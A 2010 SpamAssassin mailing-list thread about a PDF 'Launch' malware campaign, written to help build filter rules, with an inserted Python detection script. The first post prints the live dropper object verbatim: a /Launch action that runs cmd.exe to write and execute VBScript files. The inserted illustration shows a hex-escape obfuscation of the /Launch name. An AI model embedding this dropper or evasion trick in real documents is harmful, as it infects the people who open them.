Posted to users@spamassassin.apache.org by "Chip M." <sa...@IowaHoneypot.com> on 2010/04/28 20:01:29 UTC

new PDF "Launch" malware exploit (with sample)

About a month ago, Didier Stevens found a nifty way to exploit
PDFs, using their "launch action".

Original article:
	http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
More info:
	http://www.sophos.com/blogs/sophoslabs/?p=9301

Yesterday morning, several of these showed up in my feeds.
Sample:
	http://puffin.net/software/spam/samples/0007_pdf_mal.txt


The bad news is that the social engineering part is well written
(terse with decent grammar in the body) and feels like the sort of
thing that would confuse/fool naive end users.

Based on which accounts they're hitting, these may have been
created by last year's inline-PNG/RTF guy (who I'm pretty sure
is behind the recent zipped JPEG and now RTF campaigns).
If that's correct, we should expect more attacks.  He's smarter
AND more patient than pretty much all other spammers (he might
even be as smart as a tree squirrel - scary!).


The good news is there's all manner of easy to detect stuff that
shouldn't occur in "normal" PDFs. :)

Here's just the nifty Launch part (NOTE: for skimming clarity, I
removed several blank lines from around the original "Click" line):

8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs && echo pf=f.ReadAll  >> script.vbs && echo s=InStr(pf,"'SS")  >> script.vbs && echo e=InStr(pf,"'EE")  >> script.vbs && echo s=Mid(pf,s,e-s)  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)  >> script.vbs && echo s = Replace(s,"%","") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs && batscript.vbs
Click the "open" button to view this document:)
 >>
>>
endobj


I haven't seen any since the first blast, so I suspect their
signatures were widely distributed by most anti-virus orgs.

I'm mainly publishing this for all of us who like to have backup
rules, and are willing to be more general than the sometimes too
tightly focused malware sigs.

For example, I've added "script.vbs" to my instant-death PDF word
scans.

I'll be asking some of my most diverse volunteers to run some
ham-PDF-only MassChecks tonight, and see if any of my new rules
mis-fire.  Given the number of times HTML "naughty" tags appear in
ham, I will resist assuming my "reasonable" restrictions won't hit
any.
	- "Chip"
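As an added illustration of the kind of backup check Chip describes (this is not code from the original post or from SpamAssassin), here is a small Python scanner that looks for a /Launch action and the strings he mentions in raw PDF bytes. It also resolves PDF name hex escapes (e.g. /#4Caunch for /Launch) so a trivially obfuscated name still matches; the PDF fragments below are constructed.

```python
import re

# Constructed sample mirroring the structure of the object quoted above:
# a /Launch action whose /Win dictionary runs cmd.exe to write script.vbs.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /OpenAction 8 0 R >> endobj
8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && script.vbs)
 >>
>>
endobj
"""

# Constructed: the same action with hex-escaped name characters
# (/#4Caun#63h decodes to /Launch), a simple evasion of naive grep rules.
OBFUSCATED_PDF = b"%PDF-1.4\n8 0 obj << /S /#4Caun#63h /Win << /F (cmd.exe) >> >> endobj\n"

# Constructed: an ordinary PDF skeleton with no action at all.
CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"

# Strings from the post that should not occur in ordinary PDFs.
SUSPICIOUS_STRINGS = [b"script.vbs", b"cmd.exe", b"Scripting.FileSystemObject"]


def normalize_names(data: bytes) -> bytes:
    """Decode #xx hex escapes so /#4Caunch reads as /Launch.

    Applied to the whole byte string as a deliberate approximation: for
    detection we prefer a few spurious decodes over a missed /Launch name.
    """
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Report /Launch indicators found in raw PDF bytes, with a crude score."""
    norm = normalize_names(data)
    launch = re.search(rb"/S\s*/Launch\b", norm) is not None
    win = re.search(rb"/Win\s*<<", norm) is not None
    hits = [s.decode() for s in SUSPICIOUS_STRINGS if s in norm]
    # /S /Launch alone is already rare in ham; weight it highest.
    score = 2 * int(launch) + int(win) + len(hits)
    return {"launch_action": launch, "win_launch": win,
            "suspicious_strings": hits, "score": score}
```

A real mail-side rule would run this over decoded attachment bytes, and a score of 2 or more is a reasonable quarantine threshold given how seldom /Launch appears in legitimate documents.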




Re: new PDF "Launch" malware exploit (with sample)

Posted by Benny Pedersen <me...@junc.org>.
On Wed 28 Apr 2010 20:01:29 CEST, "Chip M." wrote

> About a month ago, Didier Stevens found a nifty way to exploit
> PDFs, using their "launch action".

when you get more add them here http://www.clamav.net/

-- 
xpoint http://www.unicom.com/pw/reply-to-harmful.html


Re: new PDF "Launch" malware exploit (with sample)

Posted by Bob Proulx <bo...@proulx.com>.
Rosenbaum, Larry M. wrote:
> > d.hill wrote:
> > Um... The OP did not send malware to the list. A link was supplied to
> > the original message. You must have a scanner set up to follow links.
> > That isn't a good idea, in my opinion.
> 
> There was some code in the message, right after the "Here's just the
> nifty Launch part" paragraph.  Perhaps it's not dangerous in a text
> message, but Forefront didn't like it anyway.

This was a false positive in your scanner.  It was safe as written by
the original poster.

Bob

RE: new PDF "Launch" malware exploit (with sample)

Posted by "Rosenbaum, Larry M." <ro...@ornl.gov>.
> From: d.hill@yournetplus.com [mailto:d.hill@yournetplus.com]
> Sent: Wednesday, April 28, 2010 2:29 PM
> To: users@spamassassin.apache.org
> Subject: RE: new PDF "Launch" malware exploit (with sample)
> 
> Quoting "Rosenbaum, Larry M." <ro...@ornl.gov>:
> 
> > Please don't send live malware samples to the list.
> 
> Um... The OP did not send malware to the list. A link was supplied to
> the original message. You must have a scanner set up to follow links.
> That isn't a good idea, in my opinion.

There was some code in the message, right after the "Here's just the nifty Launch part" paragraph.  Perhaps it's not dangerous in a text message, but Forefront didn't like it anyway.

> >> -----Original Message-----
> >> From: Chip M. [mailto:sa_chip@IowaHoneypot.com]
> >> Sent: Wednesday, April 28, 2010 2:01 PM
> >> To: users@spamassassin.apache.org
> >> Subject: new PDF "Launch" malware exploit (with sample)
> >>
> >> FILE QUARANTINED
> >>
> >> Microsoft Forefront Security for Exchange Server removed a file
> since
> >> it was found to be infected.
> >> File name: "Body of Message"
> >> Virus name: "TrojanDropper:Win32/Pidrop.A"
> >
> 
> 


RE: new PDF "Launch" malware exploit (with sample)

Posted by d....@yournetplus.com.
Quoting "Rosenbaum, Larry M." <ro...@ornl.gov>:

> Please don't send live malware samples to the list.

Um... The OP did not send malware to the list. A link was supplied to
the original message. You must have a scanner set up to follow links.
That isn't a good idea, in my opinion.

>> -----Original Message-----
>> From: Chip M. [mailto:sa_chip@IowaHoneypot.com]
>> Sent: Wednesday, April 28, 2010 2:01 PM
>> To: users@spamassassin.apache.org
>> Subject: new PDF "Launch" malware exploit (with sample)
>>
>> FILE QUARANTINED
>>
>> Microsoft Forefront Security for Exchange Server removed a file since
>> it was found to be infected.
>> File name: "Body of Message"
>> Virus name: "TrojanDropper:Win32/Pidrop.A"
>




RE: new PDF "Launch" malware exploit (with sample)

Posted by "Rosenbaum, Larry M." <ro...@ornl.gov>.
Please don't send live malware samples to the list.

> -----Original Message-----
> From: Chip M. [mailto:sa_chip@IowaHoneypot.com]
> Sent: Wednesday, April 28, 2010 2:01 PM
> To: users@spamassassin.apache.org
> Subject: new PDF "Launch" malware exploit (with sample)
> 
> FILE QUARANTINED
> 
> Microsoft Forefront Security for Exchange Server removed a file since
> it was found to be infected.
> File name: "Body of Message"
> Virus name: "TrojanDropper:Win32/Pidrop.A"

Re: new PDF "Launch" malware exploit (with sample)

Posted by Yet Another Ninja <sa...@alexb.ch>.
On 2010-04-28 20:01, Chip M. wrote:
> I haven't seen any since the first blast, so I suspect their
> signatures were widely distributed by most anti-virus orgs.
> 
> I'm mainly publishing this for all of us who like to have backup
> rules, and are willing to be more general than the sometimes too
> tightly focused malware sigs.
> 
> For example, I've added "script.vbs" to my instant-death PDF word
> scans.

If you still have PDFinfo in your plugin collection:

https://svn.apache.org/repos/asf/spamassassin/trunk/rulesrc/sandbox/axb/20_axb_pdf.cf

should hit on these in case AVs don't